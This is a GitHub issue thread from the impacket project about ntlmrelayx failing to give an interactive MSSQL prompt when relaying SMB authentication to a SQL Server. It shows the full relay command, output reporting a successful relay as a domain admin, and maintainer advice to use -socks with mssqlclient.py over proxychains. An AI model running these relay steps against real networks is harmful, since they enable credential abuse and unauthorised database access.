### ISSUE TITLE
interactive option of ntlmrelayx smb -> mssql does not return interactive mssql prompt

### ISSUE THREAD

**Issue by ad0nis** [CoreSecurity/impacket#422]
(impacket_env) root@computer:~/impacket# impacket_env/bin/python ntlmrelayx.py -smb2support -i -of hashes.txt -t mssql://10.20.30.40
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.20.30.50, attacking target mssql://10.20.30.40
[*] Authenticating against mssql://10.20.30.40 as DOMAIN\admin SUCCEED
[-] No SQL queries specified for MSSQL relay!

**Comment by asolino** [comment]
Add `-socks` to the list of parameters and test again

**Comment by ad0nis** [comment]
@asolino Any assistance on what to do from there? I was eventually able to get an mssql client connected, but I don't see how to interact with it from this prompt...

**Comment by dirkjanm** [comment]
This is actually a mistake in the documentation, the interactive option is not yet supported for mssql. You should use the `-socks` option as @asolino suggested, and then you can use `mssqlclient.py` with proxychains to proxy it through ntlmrelayx.

**Comment by asolino** [comment]
Agreed.. closing.
